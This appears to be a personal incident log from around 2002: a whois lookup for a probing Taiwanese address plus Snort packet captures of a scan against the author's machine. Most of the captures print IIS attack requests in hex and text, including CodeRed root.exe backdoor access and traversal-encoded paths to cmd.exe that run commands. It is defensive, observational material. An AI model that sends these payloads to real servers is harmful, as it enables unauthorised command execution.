A ping; then probes at TCP:1433 MS SQL server, TCP:445 MS-DS (Win 2K SMB), and extensive probes at TCP:80 http which snort identified as:
WEB-IIS CodeRed v2 root.exe access,
WEB-IIS cmd.exe access,
WEB-IIS ISAPI .ida access,
WEB-IIS ISAPI .idq access,
and WEB-IIS ISAPI .printer access;
and then back for a final poke at TCP:445 before going away, 18 minutes later...
Source:
BW whois 2.9 by Bill Weinman (http://whois.bw.org/)
© 1999-2001 William E. Weinman

% How to use the APNIC Whois Database www.apnic.net/db/
% Upgrade to Whois v3 on 20 August 2002 www.apnic.net/whois-v3
% Whois data copyright terms www.apnic.net/db/dbcopyright.html

inetnum: 210.201.100.128 - 210.201.100.255
netname: CMEF-HT-AP
descr: Chen Mei Fen Co.
descr: B1, No.30-20, Wen-Hua Rd., Min-Xiong Country,
descr: Jia-Yi County, Taiwan, R.O.C.
country: TW
admin-c: MC498-AP
tech-c: MC498-AP
mnt-by: MAINT-TW-APOL
changed: adm@ht.net.tw 20020531
source: APNIC
And the snort logs:
A ping in:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:55.953275 210.201.100.253 -> 12.82.129.120
ICMP TTL:48 TOS:0x0 ID:50988 IpLen:20 DgmLen:60
Type:8 Code:0 ID:512 Seq:58956 ECHO
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE

An echo reply out:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:55.963765 12.82.129.120 -> 210.201.100.253
ICMP TTL:255 TOS:0x0 ID:43559 IpLen:20 DgmLen:60
Type:0 Code:0 ID:512 Seq:58956 ECHO REPLY
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

I did have my network data sink (ACK_hole01.c) listening on TCP:1433, here, so he gets an ACK/SYN back, but he won't talk to me..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.293297 210.201.100.253:1084 -> 12.82.129.120:1433
TCP TTL:112 TOS:0x0 ID:50997 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D6C3D77 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.303653 12.82.129.120:1433 -> 210.201.100.253:1084
TCP TTL:64 TOS:0x0 ID:43566 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xB9039F17 Ack: 0x8D6C3D78 Win: 0x77C4 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.623292 210.201.100.253:1084 -> 12.82.129.120:1433
TCP TTL:112 TOS:0x0 ID:51007 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x8D6C3D78 Ack: 0xB9039F18 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.703312 210.201.100.253:1084 -> 12.82.129.120:1433
TCP TTL:112 TOS:0x0 ID:51012 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x8D6C3D78 Ack: 0xB9039F18 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.713652 12.82.129.120:1433 -> 210.201.100.253:1084
TCP TTL:64 TOS:0x0 ID:43581 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xB9039F18 Ack: 0x8D6C3D79 Win: 0x77C4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

I have nothing listening on TCP:445, here:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:02.713885 210.201.100.253:1110 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:51253 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D95234E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:05.914263 210.201.100.253:1110 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:51327 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D95234E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:12.484806 210.201.100.253:1110 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:51594 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D95234E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

And I did have ACK_hole listening on TCP:80, here, and now he gets quite chatty..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.616060 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:52202 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8E434D61 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.626450 12.82.129.120:80 -> 210.201.100.253:1248
TCP TTL:64 TOS:0x0 ID:43614 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xBB42A012 Ack: 0x8E434D62 Win: 0x77C4 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.946245 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:52211 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x8E434D62 Ack: 0xBB42A013 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.956239 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:52212 IpLen:20 DgmLen:81 DF
***AP*** Seq: 0x8E434D62 Ack: 0xBB42A013 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 0D 0A                       P/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.956650 12.82.129.120:80 -> 210.201.100.253:1248
TCP TTL:64 TOS:0x0 ID:43624 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xBB42A013 Ack: 0x8E434D8B Win: 0x77C4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:47.818256 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:53056 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x8E434D8B Ack: 0xBB42A013 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:47.819713 12.82.129.120:80 -> 210.201.100.253:1248
TCP TTL:64 TOS:0x0 ID:43672 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xBB42A013 Ack: 0x8E434D8C Win: 0x77C4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

At this point there's nothing of interest in the connection establishments/teardowns, so I'll just snip out all but the actual probes..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:48.168352 210.201.100.253:1384 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:53126 IpLen:20 DgmLen:89 DF
***AP*** Seq: 0x8EEF42F2 Ack: 0xBCBA9974 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D  +dir HTTP/1.0...
0A                                               .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:05:10.360963 210.201.100.253:1488 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:53959 IpLen:20 DgmLen:89 DF
***AP*** Seq: 0x8F820999 Ack: 0xBF0E91C7 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D  +dir HTTP/1.0...
0A                                               .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:05:32.572577 210.201.100.253:1611 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:54892 IpLen:20 DgmLen:123 DF ***AP*** Seq: 0x9023A6DA Ack: 0xC0389119 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 63 2E 2E 32 66 2E 2E 25 63 2E 2E 2F 77 69 6E %c..2f..%c../win 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd. 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe? 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0. 0A 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:05:54.804890 210.201.100.253:1736 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:55882 IpLen:20 DgmLen:123 DF ***AP*** Seq: 0x90CB6B27 Ack: 0xC0F18EE2 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 63 2E 2E 61 66 2E 2E 25 63 2E 2E 2F 77 69 6E %c..af..%c../win 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd. 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe? 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0. 0A 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:06:17.006910 210.201.100.253:1873 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:56924 IpLen:20 DgmLen:123 DF ***AP*** Seq: 0x91787A93 Ack: 0xC321B20B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 63 2E 2E 31 63 2E 2E 25 63 2E 2E 2F 77 69 6E %c..1c..%c../win 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd. 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe? 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0. 
0A 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:06:39.209012 210.201.100.253:1988 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:57913 IpLen:20 DgmLen:123 DF ***AP*** Seq: 0x92146341 Ack: 0xC434B5EA Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 63 2E 2E 39 63 2E 2E 25 63 2E 2E 2F 77 69 6E %c..9c..%c../win 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd. 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe? 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0. 0A 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:07:01.391112 210.201.100.253:2095 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:59036 IpLen:20 DgmLen:122 DF ***AP*** Seq: 0x92AC6771 Ack: 0xC542B851 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..% 63 2E 2E 32 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..2f..%c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/ 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 0D 0A .. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:07:23.573262 210.201.100.253:2189 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:60293 IpLen:20 DgmLen:122 DF ***AP*** Seq: 0x933952EB Ack: 0xC69F8B8B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..% 63 2E 2E 61 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..af..%c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/ 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:07:45.775437 210.201.100.253:2306 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:61034 IpLen:20 DgmLen:122 DF ***AP*** Seq: 0x93D952B1 Ack: 0xC8680EE7 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..% 63 2E 2E 31 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..1c..%c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/ 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:08:07.987558 210.201.100.253:2411 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:61932 IpLen:20 DgmLen:122 DF ***AP*** Seq: 0x946CBC04 Ack: 0xC93F6CD0 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..% 63 2E 2E 39 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..9c..%c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/ 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 0D 0A .. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:08:30.169690 210.201.100.253:2510 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:62794 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x95021EC8 Ack: 0xCABD7337 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c. 2E 32 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .2f..%c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+ 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:08:52.351825 210.201.100.253:2616 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:63582 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x95954084 Ack: 0xCBD031F2 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c. 2E 61 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .af..%c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+ 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:09:14.544100 210.201.100.253:2737 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:64453 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x96398D1D Ack: 0xCD45A004 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c. 2E 31 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .1c..%c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+ 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:09:36.736186 210.201.100.253:2843 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:65386 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x96D006A2 Ack: 0xCE265E65 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c. 2E 39 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .9c..%c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+ 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:09:58.938439 210.201.100.253:2964 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:837 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0x97755390 Ack: 0xCFBB758D Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../ 2E 2E 2E 2F 2E 2E 2F 2E 2E 25 32 2E 2E 2F 77 69 .../../..%2../wi 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0 0D 0A 0D 0A .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:10:21.130561 210.201.100.253:3063 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:1701 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0x9805CE80 Ack: 0xD25E43F9 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../ 2E 2E 2E 2F 2E 2E 2F 2E 2E 25 61 2E 2E 2F 77 69 .../../..%a../wi 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0 0D 0A 0D 0A .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:10:43.342744 210.201.100.253:3176 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:2716 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0x98A68BA8 Ack: 0xD3B34704 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../ 2E 2E 2E 2F 2E 2E 2F 2E 2E 25 31 2E 2E 2F 77 69 .../../..%1../wi 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0 0D 0A 0D 0A .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:11:05.534921 210.201.100.253:3284 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:3602 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0x993E52FD Ack: 0xD55034D2 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../ 2E 2E 2E 2F 2E 2E 2F 2E 2E 25 39 2E 2E 2F 77 69 .../../..%9../wi 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0 0D 0A 0D 0A .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:11:27.737151 210.201.100.253:3387 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:4446 IpLen:20 DgmLen:130 DF ***AP*** Seq: 0x99D44973 Ack: 0xD5C8D541 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 2E 2E 32 66 2E 2E 25 63 2E 2E 32 66 2E 2E 2F c..2f..%c..2f../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT 54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : 